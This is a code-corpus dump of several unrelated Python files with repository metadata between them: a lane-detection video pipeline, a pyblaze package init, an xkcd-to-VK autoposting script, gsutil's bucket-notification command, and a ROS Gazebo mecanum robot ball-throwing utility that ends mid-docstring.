# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
# The challenge videos sometimes throw errors, so the below try first
# Upon the error being thrown, set line.detected to False
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
left_line.detected = False
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
left_line.detected = False
# Next, right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
right_line.detected = False
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
right_line.detected = False
def second_ord_poly(line, val):
""" Simple function being used to help calculate distance from center.
Only used within Draw Lines below. Finds the base of the line at the
bottom of the image.
"""
a = line[0]
b = line[1]
c = line[2]
formula = (a * val ** 2) + (b * val) + c
return formula
def draw_lines(img, mtx, dist):
""" Draw Lines will first check whether the lines are detected.
If not, go back up to First Lines. If they are, we do not have to search
the whole image for the lines. We can then draw the lines,
as well as detect where the car is in relation to the middle of the lane,
and what type of curvature it is driving at.
"""
# Pull in the image
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Check if lines were last detected; if not, re-run first_lines
if left_line.detected == False | right_line.detected == False:
first_lines(img, mtx, dist)
# Set the fit as the current fit for now
left_fit = left_line.current_fit
right_fit = right_line.current_fit
# Again, find the lane indicators
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
right_lane_inds = (
(nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
# Set the x and y values of points on each line
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each again.
# Similar to first_lines, need to try in case of errors
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
count_check(left_line)
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
count_check(left_line)
# Now right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
count_check(right_line)
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
count_check(right_line)
# Generate x and y values for plotting
fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([fit_leftx - margin, fity]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_leftx + margin, fity])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([fit_rightx - margin, fity]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_rightx + margin, fity])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Calculate the pixel curve radius
y_eval = np.max(fity)
left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
# Calculate the new radii of curvature
left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * left_fit_cr[0])
right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * right_fit_cr[0])
avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
# Calculating middle of the image, aka where the car camera is
middle_of_image = img.shape[1] / 2
car_position = middle_of_image * xm_per_pix
# Calculating middle of the lane
left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
lane_mid = (left_line_base + right_line_base) / 2
# Calculate distance from center and list differently based on left or right
dist_from_center = lane_mid - car_position
if dist_from_center >= 0:
center_text = "{} meters left of center".format(round(dist_from_center, 2))
else:
center_text = "{} meters right of center".format(round(-dist_from_center, 2))
# List car's position in relation to middle on the image and radius of curvature
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
# Invert the transform matrix from birds_eye (to later make the image back to normal below)
Minv = np.linalg.inv(perspective_M)
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
return result
def process_image(image):
""" This processes through everything above.
Will return the image with car position, lane curvature, and lane lines drawn.
"""
result = draw_lines(image, mtx, dist)
return result
# Set the class lines equal to the variables used above
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
frame = cv2.imread(os.path.join(test_img_dir, test_img))
blend = process_image(frame)
cv2.imwrite('output_images/{}'.format(test_img), blend)
plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
plt.show()
| 39.743346
| 118
| 0.670796
| 1,568
| 0.075006
| 0
| 0
| 0
| 0
| 0
| 0
| 6,688
| 0.319923
|
620552e0f37628fdaf507905b2e507f52f6149a8
| 158
|
py
|
Python
|
pyblaze/nn/data/__init__.py
|
Greenroom-Robotics/pyblaze
|
e45e27fbd400b6ae2365ad2347165c7b5154ac51
|
[
"MIT"
] | 20
|
2020-03-29T08:43:15.000Z
|
2021-12-17T21:38:17.000Z
|
pyblaze/nn/data/__init__.py
|
borchero/bxtorch
|
8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb
|
[
"MIT"
] | 4
|
2020-10-27T20:43:40.000Z
|
2021-04-29T12:19:39.000Z
|
pyblaze/nn/data/__init__.py
|
borchero/bxtorch
|
8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb
|
[
"MIT"
] | 2
|
2020-08-16T18:10:49.000Z
|
2021-03-31T23:17:28.000Z
|
import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
| 31.6
| 52
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
62068b662c2e57cf87551975ea7649e2326a5cd6
| 3,128
|
py
|
Python
|
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
import requests
import os
import random
from dotenv import load_dotenv
import sys
def get_response(url, payload):
try:
response = requests.get(url, params=payload)
response.raise_for_status()
except requests.HTTPError:
sys.stderr.write("Error with URL\n")
return response
def get_url_to_upload(token, group_id):
url = "https://api.vk.com/method/photos.getWallUploadServer"
payload = {
"access_token": token,
"group_id": group_id,
"v": "5.124"
}
response = get_response(url, payload)
url_to_upload = response.json()["response"]["upload_url"]
return url_to_upload
def upload_comic_to_server(url_to_upload):
with open('xkcd.png', 'rb') as file:
files = {
'photo': file,
}
response = requests.post(url_to_upload, files=files)
response.raise_for_status()
image_on_server = response.json()
image_server = image_on_server["server"]
image_hash = image_on_server["hash"]
photo = image_on_server["photo"]
return image_server, image_hash, photo
def save_comic(image_server, image_hash, photo, token, group_id):
url = "https://api.vk.com/method/photos.saveWallPhoto"
payload = {
"access_token": token,
"server": image_server,
"hash": image_hash,
"photo": photo,
"group_id": group_id,
"v": "5.124"
}
response = get_response(url, payload)
saved_image = response.json()["response"][0]
owner_id = saved_image["owner_id"]
media_id = saved_image["id"]
return owner_id, media_id
def post_comic(owner_id, media_id, token, comment, group_id):
url = "https://api.vk.com/method/wall.post"
payload = {
"access_token": token,
"v": "5.124",
"owner_id": "-{}".format(group_id),
"message": comment,
"from_group": "1",
"attachments": "photo{}_{}".format(owner_id, media_id)
}
get_response(url, payload)
def get_last_comic_number():
url = "https://xkcd.com/info.0.json"
response = get_response(url, payload={})
last_comic_number = response.json()["num"]
return last_comic_number
def main():
load_dotenv()
token = os.getenv("ACCESS_TOKEN")
group_id = "198809484"
last_comic_number = get_last_comic_number()
url = "http://xkcd.com/{}/info.0.json".format(
random.randint(1, last_comic_number))
response = get_response(url, payload={})
comic = response.json()
image_url = comic["img"]
response = get_response(image_url, payload={})
comment = comic["alt"]
filename = "xkcd.png"
try:
with open(filename, "wb") as file:
file.write(response.content)
url_to_upload = get_url_to_upload(token, group_id)
image_server, image_hash, photo = upload_comic_to_server(url_to_upload)
owner_id, media_id = save_comic(
image_server, image_hash, photo, token, group_id)
post_comic(owner_id, media_id, token, comment, group_id)
finally:
os.remove(filename)
if __name__ == "__main__":
main()
| 27.681416
| 79
| 0.636189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 548
| 0.175192
|
620690da1f145b5b2420aa8da8460ba8aab12a29
| 9,636
|
py
|
Python
|
google-cloud-sdk/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2017-11-29T18:52:27.000Z
|
2017-11-29T18:52:27.000Z
|
google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | null | null | null |
google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2020-07-25T12:09:01.000Z
|
2020-07-25T12:09:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notifications events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
"""
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmain Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
class NotificationCommand(Command):
"""Implementation of gsutil notification command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'notification',
command_name_aliases=[
'notify', 'notifyconfig', 'notifications', 'notif'],
usage_synopsis=_SYNOPSIS,
min_args=3,
max_args=NO_MAX,
supported_sub_args='i:t:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments={
'watchbucket': [
CommandArgument.MakeFreeTextArgument(),
CommandArgument.MakeZeroOrMoreCloudBucketURLsArgument()
],
'stopchannel': []
}
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='notification',
help_name_aliases=['watchbucket', 'stopchannel', 'notifyconfig'],
help_type='command_help',
help_one_line_summary='Configure object change notification',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={'watchbucket': _watchbucket_help_text,
'stopchannel': _stopchannel_help_text},
)
def _WatchBucket(self):
"""Creates a watch on a bucket given in self.args."""
self.CheckArguments()
identifier = None
client_token = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-i':
identifier = a
if o == '-t':
client_token = a
identifier = identifier or str(uuid.uuid4())
watch_url = self.args[0]
bucket_arg = self.args[-1]
if not watch_url.lower().startswith('https://'):
raise CommandException('The application URL must be an https:// URL.')
bucket_url = StorageUrlFromString(bucket_arg)
if not (bucket_url.IsBucket() and bucket_url.scheme == 'gs'):
raise CommandException(
'The %s command can only be used with gs:// bucket URLs.' %
self.command_name)
if not bucket_url.IsBucket():
raise CommandException('URL must name a bucket for the %s command.' %
self.command_name)
self.logger.info('Watching bucket %s with application URL %s ...',
bucket_url, watch_url)
try:
channel = self.gsutil_api.WatchBucket(
bucket_url.bucket_name, watch_url, identifier, token=client_token,
provider=bucket_url.scheme)
except AccessDeniedException, e:
self.logger.warn(NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE.format(
watch_error=str(e), watch_url=watch_url))
raise
channel_id = channel.id
resource_id = channel.resourceId
client_token = channel.token
self.logger.info('Successfully created watch notification channel.')
self.logger.info('Watch channel identifier: %s', channel_id)
self.logger.info('Canonicalized resource identifier: %s', resource_id)
self.logger.info('Client state token: %s', client_token)
return 0
def _StopChannel(self):
channel_id = self.args[0]
resource_id = self.args[1]
self.logger.info('Removing channel %s with resource identifier %s ...',
channel_id, resource_id)
self.gsutil_api.StopChannel(channel_id, resource_id, provider='gs')
self.logger.info('Succesfully removed channel.')
return 0
def _RunSubCommand(self, func):
try:
(self.sub_opts, self.args) = getopt.getopt(
self.args, self.command_spec.supported_sub_args)
# Commands with both suboptions and subcommands need to reparse for
# suboptions, so we log again.
metrics.LogCommandParams(sub_opts=self.sub_opts)
return func()
except getopt.GetoptError, e:
self.RaiseInvalidArgumentException()
def RunCommand(self):
"""Command entry point for the notification command."""
subcommand = self.args.pop(0)
if subcommand == 'watchbucket':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._WatchBucket)
elif subcommand == 'stopchannel':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._StopChannel)
else:
raise CommandException('Invalid subcommand "%s" for the %s command.' %
(subcommand, self.command_name))
| 36.638783
| 113
| 0.732669
| 4,407
| 0.457347
| 0
| 0
| 0
| 0
| 0
| 0
| 5,326
| 0.552719
|
62082f1a3d2df0aa7c200e1ac37a24e5cc695f32
| 18,526
|
py
|
Python
|
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
import rospy
import sys
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
import tf.transformations as tft
import numpy as np
import math
import roslib
from std_msgs.msg import Empty as EmptyMsg
from std_msgs.msg import Float64
from nav_msgs.msg import Odometry
import time
from tool.mecanum_utils import *
roslib.load_manifest('mecanum_robot_gazebo')
class Make_mecanum_left():
def __init__(self, model_name):
self.model_name = model_name
self.pub = rospy.Publisher("/{}_vel".format(model_name), Twist, queue_size=10)
self.pub_wheel_vel_1 = rospy.Publisher("/{}/wheel_1/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_2 = rospy.Publisher("/{}/wheel_2/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_3 = rospy.Publisher("/{}/wheel_3/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_4 = rospy.Publisher("/{}/wheel_4/command".format(model_name), Float64, queue_size=10)
self.g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
self.vel_forward = 5.5 #m/s
self.vel_lateral = 1.5 #m/s
self.ball_fly_time = 0.45 #max height time [sec]
self.vel_forward_apply = 0
self.vel_lateral_apply = 0
self.amax = 3
self.spawn_pos_z = 0.5
self.ball_name = 'ball_left::ball_link'
self.torque = [0,20000,0]
self.delete_model_name = "ball_right"
self.twist = Twist()
self.get_position()
self.score = 0
def get_position(self):
self.robot_state = self.g_get_state(model_name=self.model_name)
self.object_pose = Pose()
self.object_pose.position.x = float(self.robot_state.pose.position.x)
self.object_pose.position.y = float(self.robot_state.pose.position.y)
self.object_pose.position.z = float(self.robot_state.pose.position.z)
self.object_pose.orientation.x = float(self.robot_state.pose.orientation.x)
self.object_pose.orientation.y = float(self.robot_state.pose.orientation.y)
self.object_pose.orientation.z = float(self.robot_state.pose.orientation.z)
self.object_pose.orientation.w = float(self.robot_state.pose.orientation.w)
self.angle = qua2eular(self.object_pose.orientation.x, self.object_pose.orientation.y,
self.object_pose.orientation.z, self.object_pose.orientation.w)
#print(self.object_pose.position.x, self.object_pose.position.y, self.object_pose.position.z)
#print(self.angle)
def check_velocity(self, x_vel, y_vel):
if self.vel_forward < abs(x_vel):
if x_vel > 0: x_vel = self.vel_forward
else: x_vel = -self.vel_forward
if self.vel_lateral < abs(y_vel):
if y_vel > 0: y_vel = self.vel_lateral
else: y_vel = -self.vel_lateral
return x_vel, y_vel
def set_x_velocity(self,dt):
if self.x_error > 0:
self.vel_forward_apply += self.amax * dt
if abs(self.vel_forward_apply) > self.vel_forward:
self.vel_forward_apply = self.vel_forward
else :
self.vel_forward_apply -= self.amax * dt
if abs(self.vel_forward_apply) > self.vel_forward:
self.vel_forward_apply = -self.vel_forward
def set_y_velocity(self,dt):
if self.y_error > 0:
self.vel_lateral_apply += self.amax * dt
if abs(self.vel_lateral_apply) > self.vel_lateral:
self.vel_lateral_apply = self.vel_lateral
else :
self.vel_lateral_apply -= self.amax * dt
if abs(self.vel_lateral_apply) > self.vel_lateral:
self.vel_lateral_apply = -self.vel_lateral
def stop(self):
self.vel_forward_apply = 0
self.vel_lateral_apply = 0
self.twist = Twist()
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.twist.angular.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
def move(self, x_target, y_target, my_mecanum, away_mecanum):
t0 = time.time()
dt = 0
while True:
away_mecanum.break_ball_rolling()
return_home(away_mecanum)
self.score, away_mecanum.score, meg = ball_catch_check(my_mecanum, "ball_right", self.score, away_mecanum.score, away_mecanum)
if meg:
self.stop()
away_mecanum.stop()
break
self.get_position()
t1 = time.time()
dt = t1-t0
self.x_error = x_target - self.object_pose.position.x
self.y_error = y_target - self.object_pose.position.y
if (abs(self.x_error) <0.1 and abs(self.y_error)< 0.1) :
self.stop()
away_mecanum.stop()
else :
self.set_x_velocity(dt)
self.set_y_velocity(dt)
if abs(self.x_error) < 0.1:
self.vel_forward_apply = 0
if abs(self.y_error) < 0.1:
self.vel_lateral_apply = 0
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
t0 = time.time()
def spwan_ball(self, name):
self.spawn_name = name
self.cnt = 0
self.total_break_torque = [0, 0, 0]
#time.sleep(0.1)
#print("________________________________________________")
file_localition = roslib.packages.get_pkg_dir('ball_trajectory') + '/urdf/tennis_ball/ball_main.sdf'
srv_spawn_model = rospy.ServiceProxy('/gazebo/spawn_sdf_model', SpawnModel)
self.get_position()
ball_pose = Pose()
ball_pose.position.x = self.object_pose.position.x
ball_pose.position.y = self.object_pose.position.y
ball_pose.position.z = self.object_pose.position.z + self.spawn_pos_z
ball_pose.orientation.x = self.object_pose.orientation.x
ball_pose.orientation.y = self.object_pose.orientation.y
ball_pose.orientation.z = self.object_pose.orientation.z
ball_pose.orientation.w = self.object_pose.orientation.w
file_xml = open(file_localition)
xml_string=file_xml.read()
req = SpawnModelRequest()
req.model_name = self.spawn_name
req.model_xml = xml_string
req.initial_pose = ball_pose
res = srv_spawn_model(req)
def set_ball_target(self):
self.x_target = (np.random.randint(6, 10) + np.random.rand())
self.y_target = (np.random.randint(-3, 3) + np.random.rand())
self.get_position()
self.x_error = self.x_target - self.object_pose.position.x
self.y_error = self.y_target - self.object_pose.position.y
self.s = np.sqrt(self.x_error**2 + self.y_error**2)
def throw_ball(self):
duration = 0.01
self.set_ball_target()
self.yaw_z = np.arctan(self.y_error/self.x_error)
self.ror_matrix = rotation_matrix(self.yaw_z)
vz0 = 9.8 * self.ball_fly_time
h = (self.object_pose.position.z + self.spawn_pos_z) + vz0 * self.ball_fly_time - (9.8 * self.ball_fly_time**2)/2
self.ball_fly_time_plus = np.sqrt(2 * h / 9.8)
v0 = self.s/(self.ball_fly_time + self.ball_fly_time_plus)
self.v = np.sqrt(v0**2 + vz0**2)
self.launch_angle = np.arctan(vz0/v0)
self.force = [v0 * 0.057 * 100, 0, vz0 * 0.057 *100 ]
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
self.apply_force, self.apply_torque = get_wrench(self.force, self.torque, self.ror_matrix)
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*self.apply_torque)
success = apply_wrench(
self.ball_name,
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
"""print("----------------------------------------------------")
v0, rpm = cal(force, torque)
#print("\tx_target : ",self.x_target)
#print("\ty_target : ",self.y_target)
#print("\tx_error, y_error :",x_error,y_error)
#print("\ts : ",s)
print('\tv0: {} \t RPM: {}' .format(v, rpm))
print('\tlaunch angle: ',np.rad2deg(launch_angle))
#print('\tForce [N]: ', force)
